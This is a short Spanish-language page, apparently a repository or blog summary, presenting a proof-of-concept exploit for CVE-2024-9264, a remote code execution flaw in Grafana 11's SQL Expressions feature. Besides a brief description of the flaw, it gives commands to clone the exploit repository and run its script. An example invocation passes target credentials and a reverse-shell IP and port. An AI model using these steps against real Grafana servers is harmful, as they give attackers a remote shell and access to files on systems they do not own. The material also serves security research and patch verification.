
RCE autenticado en Grafana (v11.0) a través de Expresiones SQL - Exploit PoC
RCE autenticado en Grafana (v11.0) mediante SQL Expressions - Exploit PoC
CVE-2024-9264 - Grafana v11.0
Ejecución remota de código autenticada (RCE)
PoC
CVE-2024-9264 es una vulnerabilidad crítica de ejecución remota de código e inclusión de archivos locales introducida en la función experimental “SQL Expressions” de Grafana 11. La API pasa el SQL proporcionado por el usuario directamente a la CLI de DuckDB sin una sanitización adecuada, por lo que cualquier cuenta autenticada con privilegios de Viewer o superiores puede inyectar comandos de shell o leer archivos arbitrarios, siempre que el binario de duckdb esté en el PATH del servidor.
git clone https://github.com/rvizx/CVE-2024-9264
cd CVE-2024-9264
chmod +x exploit.sh
# usage
usage: ./exploit.sh <grafana_url> <username> <password> <reverse_ip> <reverse_port>
Ejemplo:
./exploit.sh http://grafana.example.com admin LMCOP4X2?29DX2%332! 10.10.10.10 1337